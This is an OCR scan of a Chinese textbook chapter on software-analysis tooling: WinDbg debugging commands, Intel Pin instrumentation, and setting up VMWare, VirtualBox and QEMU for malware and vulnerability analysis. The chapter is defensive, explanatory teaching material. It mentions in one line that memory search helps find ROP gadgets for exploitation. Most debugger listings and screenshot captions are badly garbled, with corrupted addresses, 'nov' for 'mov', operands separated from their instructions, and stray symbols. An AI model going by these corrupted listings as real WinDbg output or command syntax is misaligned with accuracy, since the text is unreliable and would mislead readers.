根据 绝对 地 址 快速 对 指定 位 位 置 的 内 存 进 行 反 汇 编 。 当然 ,这 项 功能 也 可 以 在 反 汇 编 窗口 








L 
ntdll! NtCurrentTeb: 
77£767d9 648118000000 nov 


77£767df c3 ret 
ntdll!RtlInitString: 
77£767e0 57 push 
77£767e1 8b7c240c nov 
77£767e5 8b542408 nov 
77£767e9 c70200000000 mov 
77£767ef 897a04 nov 
77£767£2 Übff or 
0:001» u eip 

ntdll IDbgBreakPoint: 

77£767cd cc int 
77t£767ce c3 ret 
intdll!DbgUserBreakPoint.: 
77£767cf cc int 


77£767d0 c3 
ntdll IDbgBreskPointVithStatus 
77£767d1 8b442404 


77t767d5 cc int 
77£767d6 c20400 ret 
ntdll! NtCurrentTcb: 
77t767d9 648118000000 nov 
0:001» u 77£767d9 

ntdll! NtCurrentTeb: 
77£767d9 648118000000 nov 


77£767df c3 ret 
ntdll!RtlInitString: 

77£767e0 5? push 
77£767e1 8b7c240c mov 
77£767e5 8b542408 mov 
77£767e9 c70200000000 nov 
77f767ef 897204 nov 
77£767£2 Übff or 





eax,dword 


eax,dwvord 


intdll!RtlpBreakVi thStatusInstructi ion $ 


4 


eax, dvord 


eax,dvord 


edi 
edi,dvord 
edx,dvord 


ptr fs:[00000018h] 


ptr [esp+0Ch] 
ptr [esp*8] 
[edx].0 


x], 
[edx+4] edi 


ptr [esp+4] 
ptr fs:[00000018h] 
ptr fs:[00000018h] 


ptr [esp+0Ch] 
ptr [onpa] 


dvord ptr [edx 


dword ptr 
edi edi 


人 ] .edi 








图 3-41 使 用 u 命令 进行 反 汇编 


与 u 命令 类 似 的 还 有 d 命令 ,其 参数 与 u 
进 制 Hex 形式 的 值 。d 命令 可 以 是 db/dw/dd/dq. Y 9I 1/2/4/8 字 
ER ww www we 
I 


命令 对 栈 数据 进行 修改 的 结 


Ce 
节 为 单位 , 显 





0:001» db esp 
0037ffcc 0 
0037£fdc 
0037f fec 
0037fffc 
0038000c 
0038001c 
0038002c 
0038003c ?? ?? ?? 
0:001» eb esp 0f 
0:001» db esp 
D037ffcc 0 
0037f fdc 
0037f fec 
0037£ffc 
0038000c 
0038001c 
0038002c 
0038003c 

















222222222? 
? ? 


222? 
22??? 





图 3-42 WinDbg 查看 和 修改 内 存 数据 
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内 存 搜索 也 是 软件 逆向 分 析 的 一 项 基本 需求 ,WinDbg 的 s 命令 提供 了 这 样 的 功能 。 
搜索 支持 单字 节 、 双 字 节 、 四 字 节 、 八 字 节 、ASCII 字符 串 和 Unicode 字符 串 ,对 应 的 命令 
格式 为 s -b/w/d/q/a/u Range Target, Range 有 两 种 表示 方式 : 一 种 是 地 址 区 间 式 : 
0x10000000 0x1000F000; 另 一 种 是 地 址 长 度 式 : 0x10000000 -LOxF000, 其 中 长 度 单位 以 
搜索 单位 字 长 为 基准 。 如 图 3-43 所 示 ,分 别 以 地 址 区 间 、 地 址 长 度 的 方式 进行 内 存 搜索 ， 
两 种 方式 搜索 结果 一 致 。 内 存 搜索 常用 于 rop 片段 的 寻找 ,广泛 应 用 于 漏洞 利用 。 





0:001» s -b 70000000 7fffffff 83 c7 04 8b 07 

72£39970 83 c7 04 8b 07 99 33 c2-2b c2 3b c8 89 7d fc 75 
77c6f55d 83 c7 04 8b 07 43 01 06-83 c? 04 83 c6 04 3b 5d 
77f64ald 83 c7 04 8b 07 a8 02 89-7d 14 bb 00 00 00 c0 74 
7806f5e4 83 c7 04 8b 07 85 c0 75-f1 56 e8 e3 2f f9 ff 5f 
78078c5e 83 c7 04 8b 07 3b c3 89-7d f4 74 Oa 8b 08 39 19 
0:001» s -b 70000000 Lfffffff 83 c7 04 8b 07 

72£39970 83 c7 04 8b 07 99 33 c2-2b c2 3b c8 89 7d fc 75 
77c6f55d 83 c7 04 8b 07 43 01 06-83 c? 04 83 c6 04 3b 5d 
77f64ald 83 c7 04 8b 07 a8 02 89-7d 14 bb 00 00 00 c0 74 
7806f5e4 83 c7 04 8b 07 85 c0 75-f1 56 e8 e3 2f f9 ff 5f 
78078c5e 83 c7 04 8b 07 3b c3 89-7d f4 74 0a 8b 08 39 19 











图 3-43 WinDbg 内 存 搜索 


设置 断 点 是 调试 器 的 常用 功能 ,而 当 程序 还 未 加 载 完成 时 , 断 点 在 内 存 中 的 位 置 难以 
确定 , WinDbg 提供 了 符号 断 点 的 功能 。 如 图 3-44 所 示 , 分 析 人 员 分 别 基于 符号 和 地 址 
进行 断 点 设置 ,并 用 bl 命令 查看 断 点 ,用 bd 命令 禁用 断 点 ,使 断 点 处 于 disable 状态 ,用 
be 命令 重新 激活 断 点 ,使 断 点 处 于 enable 状态 ,bc 可 以 清除 断 点 。bd、be 和 bc 后 面 接 的 
参数 均 为 断 点 的 编号 , 即 图 中 的 0 和 1。 





0:001» bu kernel32!WriteFile 

0:001» bp 77e5ab4e 

0:001» bl 

0 e 77e5f£13a 0001 (0001) 0:3x kernel32!WriteFile 
1 e 77e5ab4e 0001 (0001)  0:s9* kernel32!ReadFile 
0:001» bd 0 

0:001» bl 

0 d 77e5f13a 0001 (0001) 0:xxx¥ kernel32!WriteFile 
1 e 77e5ab4e 0001 (0001) QO:xxxx* kernel32!ReadFile 
0:001» bd 1 

0:001» be 0 

0:001» bl 

0 e 77e5f13a 0001 (0001) 0:3x kernel32!WriteFile 
1 d ?7e5ab4e 0001 (0001)  0:3e* kernel32!ReadFile 








Hi344 断 点 管理 设置 


另外 ,如 果 某 个 代码 片段 被 频繁 调用 ,而 又 需要 在 该 代码 出 现 断 点 ,而 其 中 的 大 部 分 
中 断 是 我 们 不 想 要 的 ,这 时 候 可 使 用 WinDbg 提供 的 条 件 断 点 。 如 图 3-45 Bros ,设置 该 
位 置 在 ebx 等 于 4 的 条 件 下 触发 中 断 。 

模块 信息 通常 也 是 软件 漏洞 分 析 所 需 的 基本 信息 ,WinDbg 通过 lm 命令 可 以 枚 举 软 
件 加 载 的 模块 。 图 3-46 为 其 中 的 一 部 分 模块 ,有 些 模块 含有 pdb symbols, 但 也 有 很 多 模 
块 缺失 pdb symbols. 

为 了 获取 其 他 模块 的 符号 库 ,在 配置 好 符号 服务 器 的 情况 下 ,可 通过 枚 举 库 的 函数 符 
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0:001» bu kernel32!WriteFile+0x11 ".ifGebx-Üx4 Í} .else(gc)" 











0:001» bl 

0 e 77e5f13a 0001 (0001) 0:3** kernel32!UriteFile 

1 d 77e5ab4e 0001 (0001) 0:xxx¥ kernel32!ReadFile 

2 e 77e5f14b 0001 (0001) 0:*** kernel32!WUriteFile*0x1ll ".ifGebx-0x4 () .else{gc}" 





图 3-45 WinDbg 条 件 断 点 设置 





0:010» lm 

start end module name 

00250000 003d1000 ^ ole32 (deferred) 
00950000 009db000  msctfime (deferred) 
01000000 010ea000 Explorer (pdb symbols) Cc:nss\explorer .pdb\3D6DE1E22\explorer .pdb 
011c0000 011d0000 vmhgfs (deferred) 
Offd0000 Offf3000 — rsaenh (deferred) 
Sadc0000 Sadf3000 ^ UxTheme (deferred) 
5b680000 5b6ee000 themeui (deferred) 
62c20000 62c28000 LPK (deferred) 
71810000 71a18000 WS2HELP (deferred) 
71a20000 71a35000 — Ws2 32 (deferred) 








图 3-46 WinDbg 枚 举 模块 


号 迫使 WinDbg 加 载 对 应 模块 的 符号 表 。 在 图 3-47 中 ,使 用 x 命令 枚 举 WS2_32 库 的 
函数 。 





0:010» x VS2 32!* 

71a32218 US2 32!lpfnUSAttemptàutodialNanmeG = «no type information» 
71a24d34 US2 32!NSCATALOGENTRY::NSCATALOGENTRY = «no type information» 
71a21174 US2 32! imp InterlockedIncrement = «no type information» 
71a25d28 WS2 32!NSCATALOGENTRY::'"NSCATALOGENTRY = «no type information» 
71a21134 VS2 32! imp Freelibrary = «no type information» 

71a210a8 VS2 32 mp RegSetValueExÀ = «no type information» 

71a2111c US2 32! imp IsBadCodePtr = «no type infornation» 

71a30752 VS2 32!RegDeleteSubkeys = «no type information» 

71a2dcal VS2 32!NSCATALOGENTRY::WriteToRegistry = «no type information» 
71a2c8a5 VS2 32!DCATALOG::GetCurrentCatalogName = «no type information» 
71a30336 V52 32!WPUCompleteOverlappedRequest = «no type information» 
71a3059c US52 32!ÀcquireExclusiveCatalogàccess = «no type information» 
71a3068e VS2 32!RegDeleteKeyRecursive = «no type information» 

71a3083a US2 32! imp load  PeekMessageÀ = «no type information» 
71a22b24 VS2 32!WSALookupServiceNextÀ = «no type information» 

71a23c22 VS2 32!socket = «no type infornation» 

71a2229a VS2 32!NSPROVIDERSTATE::^"NSPROVIDERSTATE = «no type information» 
71a2dac9 VS52 32!NSCATALOG::VriteToRegistry = «no type information» 


图 3-47 枚 举 库 函 数 














再 次 枚 举 模块 可 以 发 现 ,该 WS2_32 对 应 的 pdb symbols 也 被 下 载 下 来 ,如 图 3-48 
所 示 ,这 种 方式 下 载 的 pdb 文件 还 可 以 用 到 其 他 地 方 , 比 如 IDA. 的 静态 分 析 。 





0:010» 1n 


start end module name 

002b0000 003d1000 — ole32 (deferred) 

00950000 009db000  nsctfime (deferred) 

01000000 010ea000 ^ Explorer (pdb symbols) c: NassNexplorer.pdb*3D6DE1E22wexplorer.pdb 
011c0000 011d0000 vnhgfs (deferred) 

Offd0000 0fff3000 rsaenh (deferred) 


5adc0000 5adf3000 ^ UxTheme (deferred) 
5b680000 5b6ee000 themeui (deferred) 
62c20000 62c28000 LPK 
71a10000 71818000 ^ VS2HELP 
eei 127000 



















4. 内 核 调试 
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WinDbg 不 仅 支 持 用 户 态 的 应 用 程序 调试 ,还 支持 内 核 态 的 调试 。 内 核 态 调试 不 支 
持 Windows 2000 及 以 下 系统 ,需要 以 调试 选项 启动 当前 系统 才能 支持 内 核 调试 ,需要 修 
改 Windows XP 的 boot. ini 文件 。 内 核 调试 可 在 当前 调试 会 话 中 输入 “. attach -k” 开 启 ， 


如 图 3-49 所 示 。 


图 





0:001» .attach -k 

Àttach will occur on next execution 

|[0:0:001» g 

Connected to Vindovs XP 2600 x86 compatible target, ptr64 FALSE 
Symbol search path is: srv*c: ass*http://nsdl.nicrosoft.con/download/synbols 
Executable search path is: 

Windows XP Kernel Version 2600 (Service Pack 1) UP Free x86 compatible 
Product: VinNt, suite: TerminalServer SingleUserTS 

Built by: 2600.xpspl.020828-1920 

Kernel base = Ux804d5000 PsLoadedModulelist = Üx8054ce30 

Debug session time: Mon Dec 21 22:05:15.656 2015 (GMT+8) 

System Uptime: 0 days 0:00:48.703 











图 3-49 WinDbg 内 核 调试 


内 核 调试 也 可 以 通过 File 菜单 的 Kernel Debugging 进入 ,选择 Local 作为 目标 ,如 


3-50 所 示 , 通 过 lm 命令 枚 举 内 核 的 模块 信息 。 


E Command - Local kernel — WinDbg:6.8.0004.0 a. ok 


Product: WinNt, suite: TerminalServer SingleUserTS 5 
Built by: 2600.xpspl.020828-1920 3 
Kernel base = 0x804d5000 PsLoadedModulelist = 0x8054ce30 

Debug session time: Mon Dec 21 22:17:04.109 2015 (GMT48) 

System Uptime: 0 days 0:12:37.156 


end nodule name 
804d5000 806c7800 nt (pdb synbols) c:\nss\ntoskrnl .pdb\C95EC79CFE 
Unloaded nodules | 
2311000 b2418000 knixer.sys 

b2817000 b283e000 — knixer.sys 

f8c75000 f8c76000 drmkaud .sys 1 
b283e000 b2861000  aec.sys 4 
b2aéd000 b2a7a000 。 Diusic.sys 

b2a7d000 b2a8b000 swmidi.sys 

f8aa6000 f8aa8000 splitter sys 

bza07000 b2ala000 Parport .SYS 

£8700000 £870£000 。 serial.sys 

f8858000 f885d000 Cdaudio.SYS 

f8351000 f8354000 — Stloppy.SYd 








图 3-50 内核 模块 解析 


内 核 调试 还 包括 远程 内 核 调试 ,是 将 WinDbg 与 VMWare 虚拟 机 结合 ,通过 com 接 
口 进行 调试 ,这 部 分 内 容 将 在 3. 3 节 进 行 介 绍 。WinDbg 内 核 调试 功能 在 稳定 性 及 用 户 
体验 等 方面 超越 了 早期 的 内 核 调试 工具 SoftICE, 导致 Compuware NuMega 公司 在 
2006 年 后 放弃 了 SoftICE 的 后 续 更 新 。 

WinDbg 支持 用 户 态 和 内 核 态 两 种 模式 的 调试 ,通过 复杂 的 控制 命令 可 以 进行 符号 
加 载 . 内 存 搜索 、 条 件 断 点 设置 等 高 级 功能 。 另 外 ,WinDbg 也 支持 插件 扩展 ,通过 编写 插 
件 扩展 辅助 记录 与 分 析 功 能 。WinDbg 是 进行 软件 分 析 的 高 效 工具 ,程序 和 更 多 资料 可 
从 其 官方 网 站 http://www. windbg. org/ 下 载 。 
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325 Pin 


Pin 是 一 款 二 进 制 代码 插 桩 分 析 框 架 , 由 Intel 公司 开发 并 维护 ,起 源 于 2004 年 , 支 
持 32 位 和 64 位 的 Windows,Linux, Mac OS, Android 等 多 个 平台 。 

Pin 提供 4 种 粒度 的 代码 插 桩 模式 : INS RI, TRACE 级 别 .RTN 级 别 和 IMG 级 
别 。INS 级 别 的 代码 插 桩 是 在 指令 执行 前 ` 后 插入 附加 代码 ,代码 量 膨胀 数 倍 ,会 导致 程 
序 执 行 缓慢 ;TRACE 级 别 是 在 指令 发 生 跳 转 时 进行 插入 ,进一步 进行 基本 块 分 析 , 常 用 
于 记录 程序 执行 序列 ;RTN 级 别 是 通过 符号 表 信 息 找到 需要 插入 的 位 置 ,需要 调用 Pin 
内 置 的 初始 化 符号 表 函 数 PIN_InitSymbols();IMG 级 别 用 于 监控 模块 的 装载 和 印 载 。 
Pin 由 其 主 程序 和 动态 库 插件 两 部 分 组 成 。 以 Windows 平台 下 为 例 ,Pin 通过 命令 pin 
. exe -t plugin. dll -processcommand 进行 启动 ,如 图 3-51 所 示 , 具 体 的 输出 由 插件 决定 ， 
通常 以 pluginname. out 命名 。 


D:Npin-windows?pin.exe -t pindllwinvocation.dll notepad.exe 





图 3-51 Pin 的 启动 命令 


表 3-1 给 出 了 Pin 源码 中 的 部 分 插件 及 功能 说 明 。 
表 3-1 Pin 插件 功能 说 明 




















插 件 名 功能 说 明 
inscount 统计 执行 的 指令 数量 ,输出 到 inscount. out 文件 
itrace 记录 执行 指令 的 eip 
malloctrace 记录 malloc 和 free 的 调用 情况 
pinatrace 记录 读 写 内 存 的 位 置 和 值 
proccount 统计 Procedure 的 信息 ,包括 名 称 ,镜像 .地址 ,指令 数 
w_malloctrace 记录 RtlAllocateHeap 的 调用 情况 











Pin 的 特点 在 于 它 是 一 套 二 进 制 代码 插 桩 框架 ,具备 良好 的 用 户 扩展 接口 ,提供 多 个 
层次 的 插 桩 需求 ,能 够 在 指令 、 函 数 等 不 同 层次 满足 用 户 不 同 的 需求 。 与 调试 器 相 比 , 插 
桩 分 析 不 需要 手动 设置 断 点 ,可 以 批量 提取 各 个 执行 点 的 寄存 器 和 内 存 状 态 ,提取 的 数据 
越 多 ,其 资源 消耗 越 大 ,性 能 上 低 于 调试 器 。 类 似 的 工具 还 有 Valgrind 和 DynamoRIO。 
Valgrind 是 Linux 平台 下 的 二 进 制 代码 仿真 调试 框架 ,插件 工具 有 Memcheck、 
Callgrind, Cachegrind 等 ;DynamoRIO 也 是 一 款 二 进 制 代码 插 桩 分 析 框 架 , 在 其 基础 上 衍 
^E T Dr Memory .drcpusim ,inscount 等 诸多 分 析 工 具 。 关 于 Pin, Valgrind, DrnamoRIO 
的 更 多 资料 可 从 以 下 网 站 获取 : 

https: / /software. intel. com/en-us/articles/ pin-a-dynamic-binary-instrumentation-tool 

http://valgrind. org/ 


http://www. dynamorio. org/ 
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3.3 虚拟 化 辅助 分 析 平 台 


虚拟 化 是 资源 的 抽象 化 ,是 单一 物理 资源 的 多 个 逻辑 表示 ,如 将 一 台 实 体 计算 机 虚拟 
为 多 台 逮 辑 计算 机 。 虚 拟 化 具有 兼容 性 、 隔 离 的 优良 特征 ,体现 为 兼容 标准 操作 系统 及 运 
行 于 操作 系统 的 程序 ,每 个 逻辑 计算 机 内 的 资源 相互 独立 不 受 影响 。 在 恶意 代码 与 漏洞 
分 析 过 程 中 经 常会 使 用 虚拟 化 平台 进行 辅助 分 析 , 这 不 仅 可 以 保护 真实 的 物理 设备 环境 
不 被 恶意 代码 攻击 ,还 能 够 固化 保存 分 析 环 境 以 提高 工作 效率 ,同时 还 能 够 在 不 影响 程序 
执行 流 的 情况 下 动态 捕获 程序 内 存 .CPU 等 关键 数据 。 虚 拟 化 技术 按照 实现 技术 的 不 同 
可 分 为 软件 虚拟 化 和 硬件 虚拟 化 。 软 件 虚拟 化 是 指 用 纯 软 件 的 方法 在 现 有 平台 上 实现 对 
物理 资源 访问 的 截获 和 模拟 ,使 用 软件 虚拟 化 技术 的 典型 案例 是 QEMU ;硬件 虚拟 化 是 
指 由 硬件 平台 对 特殊 指令 进行 截获 和 重 定向 , 交 由 虚拟 机 监控 器 (VMMD) 进行 处 理 , 这 需 
要 CPU( 如 Intel. VT), EH, BIOS 和 软件 的 支持 ,支持 硬件 虚拟 化 技术 的 软件 有 
VMWare, Virtual Box, KVM, Xen 等 。 虚 拟 化 技术 根据 是 否 改 动 操作 系统 可 分 为 半 虚 拟 
化 与 全 虚拟 化 。 半 虚拟 化 又 称 为 准 虚拟 化 ,通过 修改 开源 操作 系统 ,将 虚拟 机 特殊 指令 的 
被 动 截获 请 求 转化 成 客户 机 操作 系统 的 主动 通知 以 提高 性 能 ,典型 的 例子 是 Xen, 适 用 于 
Linux、Solaris 等 开源 操作 系统 。 全 虚拟 化 是 指 不 需要 对 操作 系统 进行 改动 ,提供 了 完整 
的 包括 处 理 器 、 内 存 和 外 设 的 虚拟 化 平台 ,VMWare、Virtual Box, QEMU 都 属于 全 虚 
拟 化 。 


331 VMWare Workstation 


VMWare Workstation 是 一 款 常 见 的 桌面 虚拟 化 软件 ,由 VMWare 公司 开发 ,该 公 
司 成 立 于 1998 年 ,底下 产品 有 VMWare Workstation, VMWare vSphere, VMWare 
Player, VMWare ESXi 等 。 其 中 ,VMWare Workstation, VMWare ESXi 是 商业 付费 软 
件 ,VMWare Player 是 免费 软件 。VMWare Workstation 是 应 用 广泛 的 桌面 虚拟 化 软件 ， 
支持 在 32 位 和 64 位 的 Windows、Linux、Mac OS 平台 上 运行 ,支持 虚拟 Windows 98/ 
2000/2003/XP/7/8/10, Ubuntu 等 各 个 版 本 操作 系统 。 

1. 虚拟 机 管理 

VMWare Workstation 的 功能 包括 虚拟 机 创建 安装 、 运 行 、 管 理 。 图 3-52(a) 为 虚拟 
机 运行 界面 ,包括 虚拟 机 列表 窗口 和 虚拟 机 运行 窗口 。 图 3-52(b) 为 虚拟 机 的 设置 界面 ， 
主要 用 于 配置 硬件 ,包括 内 存 .CPU 、 硬 盘 、 光 驱 、 网 卡 、.USB 接口 等 外 设 的 配置 。 

内 存 设置 需要 在 虚拟 机 关闭 时 进行 ,最 小 4MB. 最 大 64GB, 并 且 需 要 足够 的 硬件 内 
存 。CPU 的 配置 也 需要 在 虚拟 机 关闭 时 进行 ,可 设置 处 理 器 数量 和 每 个 处 理 器 的 核心 数 
量 , 这 也 需要 硬件 有 足够 的 处 理 器 数量 ;另外 可 设置 虚拟 化 引擎 ,包括 二 进 制 转换 加 速 、 硬 
件 虚拟 化 Intel VT-x 等 。 硬 盘 配 置 可 以 在 虚拟 化 运行 过 程 中 动态 添加 ,支持 磁盘 类 型 
IDE( 关 机 下 添加 ) SCSI, SATA ,硬盘 容量 可 立即 分 配 或 者 运行 过 程 中 动态 扩展 。 立 即 
分 配 占 用 空间 大 ,比如 一 次 性 分 配 40GB. 但 不 会 随 着 虚拟 机 的 运转 扩张 ;动态 扩展 在 前 
期 占用 空间 小 ,但 会 随 着 虚拟 机 的 运行 不 断 扩 大 ,即使 删除 虚拟 机 内 部 的 数据 也 不 会 减 小 
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(a) 虚拟 机 运行 界面 (b) 虚拟 机 设置 界面 
图 3-52 VMWare 运行 和 设置 界面 


磁盘 空间 ,需要 进行 碎片 整理 和 压缩 磁盘 ,如 图 3-53 所 示 , 压 缩 后 减少 了 AGB 的 占用 空 
间 。 光 驱 的 加 载 可 以 是 物理 光驱 ,也 可 以 是 ISO 镜像 文件 。USB 接口 支持 1. 1、2. 0、 
3.0, 具 体 兼 容 哪 个 版 本 需要 进行 配置 ,并 且 可 以 通过 VMWare 的 右键 菜单 连接 挂 载 或 者 
断 开 连 接 使 其 连接 到 物理 设备 。 网 卡 的 配置 支持 桥接 模式 .NAT 模式 、 仅 主机 模式 等 ， 
常用 的 是 桥接 模式 和 NAT 模式 。 桥 接 是 直接 连接 物理 网 络 ,需要 外 部 路 由 分 配 IP 地 
址 ;NAT 是 与 主机 共享 专用 网 络 ,无 须 外 部 分 配 TP 地 址 ,虚拟 机 可 支持 多 个 网 卡 。 

2. 数据 交互 

数据 交互 是 指 物理 主机 与 虚拟 机 之 间 的 数据 双向 传输 ,包括 数据 传人 虚拟 机 和 从 
虚拟 机 传 出 。 直 接 拖 忠 与 复制 粘贴 是 最 方便 的 一 种 数据 传输 方式 ,通过 在 虚拟 机 内 部 
安装 VMWare tools 可 以 实现 这 一 功能 ,而 且 还 支持 虚拟 机 与 物理 主机 之 间 的 文本 复制 
粘贴 。 共 享 文件 夹 也 是 常用 的 一 种 文件 共享 方式 ,是 将 物理 主机 的 磁盘 或 者 文件 夹 映 
射 到 虚拟 机 的 网 络 磁盘 的 一 种 共享 方式 ,可 设置 成 只 读 或 者 可 读 可 写 的 权限 来 支持 双 
向 传输 ,如 图 3-54 Jr zs ,通过 左 图 设置 共享 路 径 和 开启 网 络 映射 驱动 器 设置 ,达到 右 图 
虚拟 机 成 功 添加 网 络 共享 磁盘 的 效果 。 了 映射 虚 拟 磁盘 是 物理 主机 单 向 访问 虚拟 磁盘 
的 一 种 数据 传输 方式 ,这 种 方式 将 虚拟 机 磁盘 以 只 读 方 式 映射 到 主机 硬件 驱动 器 ,只 
能 读数 据 ,不 能 写 数据 。 网 络 传输 和 USB 设备 挂 载 也 是 虚拟 机 与 物理 主机 间 的 一 种 双 
向 传输 数据 方式 ,需要 网 络 支持 和 USB 设备 的 支持 ,与 多 台 物 理 设备 间 的 数据 传输 无 
差异 。 

3. 快照 功能 

VMWare Workstation 虚拟 机 本 身 不 具备 恶意 代码 分 析 、 漏 洞 分 析 的 功能 .需要 在 虚 
拟 操作 系统 内 部 安装 IDA , WinDbg, OllyDbg 等 静态 和 动态 分 析 工 具 , 构 建 恶意 代码 和 漏 
洞 分 析 环 境 。 通 过 多 个 虚拟 机 可 以 形成 多 套 不 同 版 本 系统 、 软 件 的 分 析 环 境 ,满足 分 析 环 
境 多 样 化 的 需求 ,降低 了 购置 大 量 设备 配置 不 同 分 析 环 境 的 开销 。 通 过 VMWare 
Workstation 的 快照 管理 功能 存储 备份 安装 了 不 同 软 件 或 者 同一 软件 不 同 版 本 的 分 析 环 
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图 3-53 虚拟 机 磁盘 压缩 
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图 3-54 VMWare 共享 文件 夹 设置 








境 , 如 图 3-55 所 示 ,这 不 仅 避 免 了 分 析 环 境 在 使 用 过 程 中 遭 到 破坏 需要 重新 构建 的 繁重 
工作 ,而 且 能 够 满足 不 同样 本 需要 不 同 分 析 环 境 的 多 样 性 需求 。 

4. 内 核 调 试 功能 

VMWare 结 合 WinDbg 可 进行 内 核 驱 动 调试 ,需要 设置 被 调试 目标 虚拟 机 、 
VMWare 和 WinDbg。 首 先是 设置 虚拟 机 ,要 设置 以 调试 模式 启动 ,添加 调试 端口 ,设置 
波 特 率 ,如 图 3-56(a) 所 示 ,. Windows XP 系统 通过 编辑 启动 盘 下 的 隐藏 文件 boot. ini 进 
行 设置 ,调试 端口 名 为 com_1, 波 特 率 为 115 200。 然 后 关闭 虚拟 机 ,设置 VMWare, 添 加 


E 软件 安全 分 析 与 应 用 


ig My Win Xp - VMware Workstation - c ES 
| zmn sao mmo) anm) masm ewa |I | D COD 

















L4 d 
(| & ibe 和 A ~ 























EP ABI Server 
ED Windows Server 2003| 
E My Vin Xp. 
地 copCatch 
wo E $—6—6—6G 
Sese | ox riw» 2 
E Clone of Andrcid-Ke: p0 
Lp 
AARET... 
[r] RK) 
FURO). 
WE 
< o > 





REG) 自动 保护 [A)- 关闭 L2] 


图 3-55 VMWare 快照 管理 功能 


“ 串 行 端口 ”类 型 设置 为 “输出 到 命名 管道 ", 如 图 3-56(b) 所 示 ,管道 名 字 为 “\\. NpipeN 
com_1”, 其 中 的 com 1 与 boot. ini 中 配置 的 端口 需要 一 致 。 
































(a) Windows XP 的 调试 启动 设置 (b) VMWare 的 串 行 端口 设置 
图 3-56 VMWare-- WinDbg 调试 Windows XP 内 核 设置 


最 后 可 以 启动 虚拟 机 ,开启 WinDbg, 使 用 内 核 调试 中 的 COM 串口 模式 ,如 图 3-57 Ca) 
所 示 , 设 置 管道 名 称 和 波 特 率 ,与 之 前 在 VMWare 中 的 设置 保持 一 致 。 确 定之 后 开始 调 
试 ,如 图 3-57(b) 所 示 , 通 过 lm 查看 内 核 模 块 ,用 t 命令 单 步 执行 ,寄存 器 的 eip 值 为 
0x8054209d, 属 于 内 核 态 的 地 址 。 调 试 过 程 中 ,虚拟 机 内 的 操作 系统 是 中 断 的 ,鼠标 和 键 
盘 都 失效 ,这 也 是 需要 配合 VMWare 虚拟 机 的 原因 。 本 地 内 核 调试 理论 上 也 应 该 中 断 调 
试 器 ,但 是 这 样 就 无 法 调试 了 。 
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(a) WinDbg 设置 COM (b) WinDbg 调试 内 核 界面 
图 3-57 WinDbg 通过 COM 调试 VMWare 虚拟 机 内 核 


更 多 关于 VMWare 的 资料 和 软件 可 从 http://www. VMWare. com/ 获 得 。 
332 VirtualBox 


VirtualBox 是 一 款 桌 面 虚拟 化 软件 ,由 德国 Innotek 公司 开发 ,起 源 于 2004 年 ， 
2008 年 被 Sun Microsystems 公司 收购 ,2010 年 又 被 Oracle 公司 收购 。VirtualBox 可 运 
fT T. Windows, Linux, Mac OS 等 操作 系统 平台 ,支持 的 虚拟 机 操作 系统 包括 DOS、 各 版 
本 的 Windows,Linux,Solaria, OpenBSD 等 。 

VirtualBox 的 功能 包括 创建 .安装 .运行 虚拟 机 ,如 图 3-58 所 示 , 通 过 “设置 "菜单 可 
对 虚拟 机 进行 设置 ,这 些 设置 包括 常规 基本 设置 .高 级 设置 ,系统 的 主板 .处 理 器 、 硬 件 加 
速 选 项 的 配置 ,关于 显示 的 显卡 .远程 桌面 .录像 功能 的 设置 ,关于 存储 的 硬盘 .光驱 设置 ， 
关于 声音 的 音频 驱动 .控制 芯片 设置 ,网 卡 的 添加 与 删除 设置 ,串口 的 启用 与 编号 等 参数 
设置 ,USB 设备 的 启用 与 关闭 设置 ,共享 文件 夹 路 径 的 设置 等 。 通 过 安装 VirtualBox 的 
扩展 包 , 可 以 实现 虚拟 机 与 主机 的 文件 共享 ,文件 拖 电 传输 ,还 可 以 通过 共享 剪贴 板 实现 


相互 复制 文本 内 容 的 功能 。 
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图 3-58 VirtualBox 设置 说 明 
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VirtualBox 与 VMWare 在 功能 上 大 致 相同 ,在 VirtualBox 虚拟 机 内 部 安装 静态 和 
动态 分 析 工 具 可 以 构建 恶意 代码 和 漏洞 分 析 环 境 ,通过 多 个 虚拟 机 可 以 形成 多 套 不 同 版 
本 系统 、 软 件 的 分 析 环 境 , 通 过 快照 管理 功能 存储 备份 安装 了 不 同 软 件 或 者 同一 软件 不 同 
版 本 的 分 析 环 境 。VirtualBox 本 身 不 具备 分 析 恶 意 代码 和 漏洞 的 能 力 , 需 要 辅助 额外 的 
分 析 工 具 , 但 VirtualBox 是 一 款 免 费 开 源 软 件 , 遵 循 GPL V2 许可 ,可 进行 二 次 开发 和 扩 
展 。 更 多 关于 VirtualBox 的 资料 和 软件 可 从 其 官方 网 站 https://www. virtualbox. org/ 
获取 。 


333 QEMJ 


QEMU 是 一 款 开源 的 虚拟 化 平台 ,通过 自身 的 指令 翻译 模块 模拟 程序 的 执行 ,由 
Fabrice Bellard 开发 ,起 源 于 2006 年 。QEMU 支持 x86, AMD64, MIPS R4000, ARM 等 
架构 ,可 扩展 和 自 定义 新 的 指令 集 ,主要 运行 于 Linux 平台 ,结合 Cygwin 可 运行 于 
Windows 平台, 支持 虚拟 Windows、Linux 等 各 版 本 的 操作 系统 。 

1. 虚拟 机 的 维护 管理 

QEMU 以 命令 行 的 方式 对 虚拟 机 进行 创建 ` 维 护 和 管理 ,图 3-59 为 QEMU 运行 时 
的 界面 ,没有 VMWare 和 VirtualBox 的 各 项 管理 菜单 , 仅 有 最 小 化 .最 大 化 .关闭 按钮 ， 
需 用 命令 行进 行 管理 。 





图 3-59 QEMU 运行 界面 图 


1) 创建 虚拟 机 镜像 
虚拟 机 镜像 磁盘 管理 工具 qemu-img 用 于 创建 和 维护 虚拟 机 镜像 ,创建 镜像 的 命令 
如 下 : 


qemu- img create -f qcow2 [win7.qcow2] [20G] 
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其 中 qcow2 是 镜像 格式 ,win7. qcow2 是 镜像 名 ,20G 是 镜像 的 磁盘 容量 。 创 建 的 镜像 并 
不 会 立刻 分 配 所 有 空间 ,而 是 在 使 用 过 程 中 动态 扩展 。 
另外 ,可 以 创建 镜像 的 链接 ,命令 如 下 : 


qemu- img create -f qcow2 -b [win7.qcow2] [win7 new.qcow2] 


其 中 win7. qcow2 是 原始 镜像 ,win7_new. qcow2 是 新 的 镜像 ,原始 镜像 可 保持 不 动作 为 
备份 ,而 且 可 以 创建 多 个 链接 镜像 。 在 QEMU 运行 过 程 中 如 果 发 生 断 电 等 意外 ,可 能 导 
致 镜像 的 损坏 ,因此 在 运行 时 使 用 链接 镜像 ,这 样 能 够 保障 原始 镜像 不 被 损坏 。 通 常 在 安 
装 完 操作 系统 后 ,或 者 安装 完 一 款 软件 之 后 ,将 虚拟 机 关闭 ,再 创建 链接 镜像 。 

2) 虚拟 机 操作 系统 安装 

